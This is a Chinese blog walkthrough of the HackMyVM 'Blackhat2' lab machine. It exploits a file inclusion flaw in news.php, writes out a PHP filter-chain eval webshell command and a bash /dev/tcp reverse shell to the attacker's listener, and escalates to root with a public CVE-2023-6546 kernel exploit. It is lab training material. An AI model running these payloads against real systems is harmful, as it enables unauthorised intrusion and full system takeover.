Blackhat2 - hackmyvm

最新推荐文章于 2024-05-25 14:58:14 发布
最新推荐文章于 2024-05-25 14:58:14 发布
阅读量422 收藏 4
点赞数 4
分类专栏: hackmyvm 文章标签: 网络 安全 网络安全 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tanbinn/article/details/138919129
版权

简介

靶机名称:Blackhat2

难度:中等

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Blackhat2

本地环境

虚拟机:vitual box

靶场IP(Blackhat2):192.168.56.114

跳板机IP(windows 10):192.168.56.1 192.168.190.100

渗透机IP(ubuntu 22.04):192.168.190.30

扫描

御剑扫目录,有很多图片之类的无效路径,关键是/news.php

image-20240515154745053

有个输入框,尝试LFI,成功。

image-20240515153758544

filter执行webshell

 python3 php_filter_chain_generator.py --chain '<?php eval($_POST["a"]);?>'

image-20240515162650707

image-20240515162937211

攻击机起监听和http服务器,让靶机下载shell脚本执行后得到shell

攻击机

rlwrap -cAr nc -lvvp 40000

python3 -m http.server 40001

1.sh

bash -i  >& /dev/tcp/192.168.56.1/40000 0>&1

image-20240515163541994

成功拿到shell

升级脚本:

/usr/bin/script -qc /bin/bash /dev/null

提权

靶机的内核版本完全符合CVE-2023-6546

uname -a
Linux blackhat2.hmv 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux

image-20240515181418784

这个项目https://github.com/YuriiCrimson/ExploitGSM可以进行该CVE的提权

image-20240515182221552

在本机上编译好后,传送到靶机上运行即可提权

image-20240515182203651

user_flag : 156532dab679edf6f8e53c8787a09264

root_flag : 30f55e2f86961a07e3a181a82f602ed6

后谈

这个提权手法其实算是走了捷径,作者的思路是通过dpkg -verify找到被更改的包文件,然后发现黑客埋下的后门进行利用。这个手法在HGBE佬的WP上有写,我这里只是做个补充罢了。

(内核提权方式不稳定,我自己是一遍过的。如果复现不出来的话建议多试几次或者改一下靶机的设置,多点核多点内存之类的)

古明地核
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
opencv-python笔记2
txjoe的博客
11-13 809
opencv初级
BlackHat2023-ASIA.rar
05-30
2023亚洲黑帽大会演讲ppt
探索黑客艺术:Blackhat Python3 - 你的安全编程助手
gitblog_00038的博客
04-25 264
探索黑客艺术:Blackhat Python3 - 你的安全编程助手 项目地址:https://gitcode.com/EONRaider/blackhat-python3 项目简介 Blackhat Python3 是一个面向网络安全领域的Python代码库,它集合了大量的实用脚本和教程,旨在帮助开发者和信息安全专业人员利用Python进行各种安全相关的任务。这个项目的目的是让学习者能够快速掌握...
OpenCV-黑帽运算(BLACKHAT)
热门推荐
翟天保的博客
05-24 1万+
黑帽运算:闭运算图减原图
高光时刻丨赛宁网安携前沿技术研究亮相Blackhat 2022
Cyberpeace的博客
08-15 452
赛宁网安天虞实验室共4名研究人员参与了本次议题的研究,通过Blackhat 2022向外界分享了赛宁网安技术探索的全新成果。
[旧文系列] Struts2历史高危漏洞系列-part5:S2-052/S2-053/S2-057
mole_exp的博客
01-18 738
文章目录关于<旧文系列>前言S2-052漏洞复现与分析可回显PoC漏洞修复S2-053漏洞复现与分析可回显PoC漏洞修复S2-057漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 htt
[旧文系列] Struts2历史高危漏洞系列-part3:S2-012/S2-013/S2-015
mole_exp的博客
01-18 1048
文章目录关于<旧文系列>前言S2-012漏洞复现与分析可回显PoC漏洞修复S2-013漏洞复现与分析可回显PoC漏洞修复S2-015漏洞复现与分析Vuln-1: Wildcard matchingVuln-1 可回显PoCVuln-2:Double evaluation of an expressionVuln-2 可回显PoC漏洞修复针对 Vuln-1:Wildcard matching 的漏洞修复针对 Vuln-2:Double evaluation of an expression 的漏洞
BlackHat USA 2021 洞察(二):议题技术解读
漏洞战争
08-17 626
发现看议题材料也不容易啊,有些议题挺有技术深度的,而且内容还特长,长就算了,有些ppt其实只讲了不到一半的内容,另一半都得靠作者演讲才能知道,剩下的只能靠自己脑补或搜索资料了,我只能说真的...
【转载】2010 BlackHat - 即时恶意软件分析和控制方案
BetaBin
05-20 1389
转载自:http://www.leadfrenzy.net/comments.php?y=10&m=08&entry=entry100819-164418 存档之用。 其实我也觉得这个检测不足太多了,限制条件比较苛刻的感觉…… ############################ 原标题:Goodware drugs for malware: on-the-fly malware
[旧文系列] Struts2历史高危漏洞系列-part2:S2-007/S2-008/S2-009
mole_exp的博客
01-18 1928
文章目录关于<旧文系列>前言S2-007漏洞复现与分析可回显PoC漏洞修复S2-008漏洞复现与分析Vuln-1:Remote command execution in CookieInterceptorVuln-2:Remote command execution in DebuggingInterceptorVuln-2:可回显PoC漏洞修复S2-009漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技
blackhat-fuzzing
01-28
关于fuzzing测试方面的指导手册,里面涵盖了Fuzzing的各个方面,值得一看。
blackhat-global:基于Blackhat-Global-Lite OS Debian Buster的自定义发行版-开源
05-08
我们很高兴宣布Blackhat-Global OS Lite的可用性。 我们将完整的Blackhat-Global经验浓缩为一种简化的操作系统,该操作系统基于快速,用户友好的,面向桌面的操作系统。 可以立即下载。 Blackhat-Global Lite是基于...
blackhat-arsenal-tools:官方的Black Hat Arsenal安全工具存储库
02-06
blackhat-arsenal-tools:官方的Black Hat Arsenal安全工具存储库
BlackHat-DC-2011-Grand-Workshop_hardwaremonitor_crack_security_源
09-29
Hardware Reverse Engineering: Access Analyze & DefeatBlack Hat DC 2011 Workshop
计算机网络安全控制技术
最新发布
heikewhite的博客
05-25 416
防火墙技术是近年来维护网络安全最重要的手段,但是防火墙不是万能的,需要配合其他安全措施来协同。目前加密技术主要有两大类:对称加密和非对称加密。核心是识别网络者是否是属于系统的合法用户。入侵行为主要是指对系统资源的非授权使用。计算机病毒的数目和危害性都在飞速发展。控制不同的用户对信息资源的访问权限。漏洞检测和安全风险评估技术。6.网络安全漏洞扫描技术。
20212416 2023-2024-2 《网络与系统攻防技术》实验七实验报告
m0_63943694的博客
05-22 907
在靶机(实验中直接用Windows本机的)用浏览器访问kali的IP,可以看到是和学院邮箱一模一样的网页。输入kali虚拟机IP以及目标网站URL进行克隆,这里使用学校邮箱登录网站。结合应用两种技术,用DNS spoof引导特定访问到冒名网站。输入用户名和密码,发现在kali虚拟机中可以捕获到信息。双击激活dns_spood插件,启用DNS欺骗。简单应用SET工具建立冒名网站。选择 1)社会工程学攻击。启动Apache2服务。选择 2)网站攻击向量。选择 3)口令截取方式。
netstat命令检查端口是否监听
weixin_53389944的博客
05-23 288
命令会显示所有当前活动的 TCP 和 UDP 连接,并列出每个连接对应的本地地址、远程地址以及端口号。是一个常用的网络命令,用于显示系统的网络连接情况。
CTF实战分享 | RWZIP
2401_84466225的博客
05-24 687
首先我们要了解,压缩包本身并不具备隐藏信息的功能,但由于在CTF竞赛中,经常出现压缩包与隐写术结合在一起的题目,所以我们需要掌握在CTF竞赛中有关 ZIP 压缩包题目的常见题型及分析手段。读者福利 |CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
cv2.MORPH_BLACKHAT
07-27
cv2.MORPH_BLACKHAT 是 OpenCV 库中的一个形态学操作函数,用于计算图像中的黑帽运算。黑帽运算是图像腐蚀与图像原始图像之间的差值,可以用于检测图像中的小型黑色区域或者局部极小值。 具体使用方法如下: ```python import cv2 import numpy as np # 读取图像 image = cv2.imread('image.jpg', 0) # 定义结构元素 kernel = np.ones((5,5), np.uint8) # 进行黑帽运算 blackhat = cv2.morphologyEx(image, cv2.MORPH_BLACKHAT, kernel) # 显示结果 cv2.imshow('Blackhat', blackhat) cv2.waitKey(0) cv2.destroyAllWindows() ``` 在上述代码中,我们首先读取了一张灰度图像,然后定义了一个 5x5 的结构元素。接下来,我们使用 `cv2.morphologyEx` 函数进行黑帽运算,并将结果显示出来。 请注意,此函数的第一个参数是输入图像,第二个参数是要执行的形态学操作类型(这里是 `cv2.MORPH_BLACKHAT`),第三个参数是结构元素(这里是 `kernel`)。最后,我们使用 `cv2.imshow` 函数显示黑帽运算的结果。 希望能帮到你!如果还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值